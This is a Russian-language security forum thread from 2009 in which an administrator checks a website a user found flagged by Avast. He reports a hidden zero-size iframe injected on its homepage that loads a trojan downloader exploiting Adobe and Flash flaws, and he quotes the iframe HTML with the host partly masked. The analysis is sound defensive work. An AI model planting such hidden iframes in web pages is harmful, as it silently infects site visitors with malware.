1. Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.
    Если у вас возникли проблемы с регистрацией на форуме - то вы можете сообщить об этом с помощью этой формы без авторизации,администрация форума обязательно отреагирует на вашу проблему.
    Скрыть объявление

Прошу проверить israelmilitary.com, аваст ругается

Тема в разделе "Сетевая безопасность для начинающих", создана пользователем alfabravo, 2 авг 2009.

Статус темы:
Закрыта.
  1. alfabravo
    Оффлайн

    alfabravo Активный пользователь

    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    301
    прошу проверить

    хтппп//www.israelmilitary.com[/url]
    прошу проверить
     
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    13.080
    Симпатии:
    14.373
    Баллы:
    2.193
    На главной iframe скрытый
    PHP:
    <iframe src="http://rey****.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://rey****.net/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    Добавлено через 3 минуты 11 секунд
    За которым скывается Trojan-Downloader.JS.Iframe.bmu

    Добавлено через 2 минуты 50 секунд
    Который пытается подгрузить в машину юзера зловреда, используя уязвимость в продуктах adobe.

    Добавлено через 2 минуты 7 секунд
    Точнее Exploit.Win32.Pidief.bes

    Добавлено через 6 минут 21 секунду
    И флеш ролик... пока детектиться только
    Sophos - Troj/SWFDlr-P
    McAfee - Exploit-CVE2007-0071

    Зловред на один и тот-же IP не срабатывает.
     
  3. alfabravo
    Оффлайн

    alfabravo Активный пользователь

    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    301
    Спасибо большое! у меня Аваст,была ли возможность заражения? Что мне делать? Что хотел этот вирус в моей машине?
     
  4. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    13.080
    Симпатии:
    14.373
    Баллы:
    2.193
    Что загрузится после получения доступа неизвестно мне. Если хотите проверить машину, милости просим. Если Аваст сумел заблокировать, то, скорее всего заражения не произошло... но утверждать не берусь... сильно много факторов.
     
  5. alfabravo
    Оффлайн

    alfabravo Активный пользователь

    Сообщения:
    19
    Симпатии:
    0
    Баллы:
    301
    Спасибо! Да,Аваст свистел и давал сирены постоянно,закрывал все открытые мной там пункты и выдавал по три строчки предупреждений.
     
  6. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    13.080
    Симпатии:
    14.373
    Баллы:
    2.193
    Пришел ответ.
    39004936_132691494_youwhichsites.swf - Exploit.SWF.Downloader.oa

    Сайт добавлен в список опасных.
     
Статус темы:
Закрыта.

Поделиться этой страницей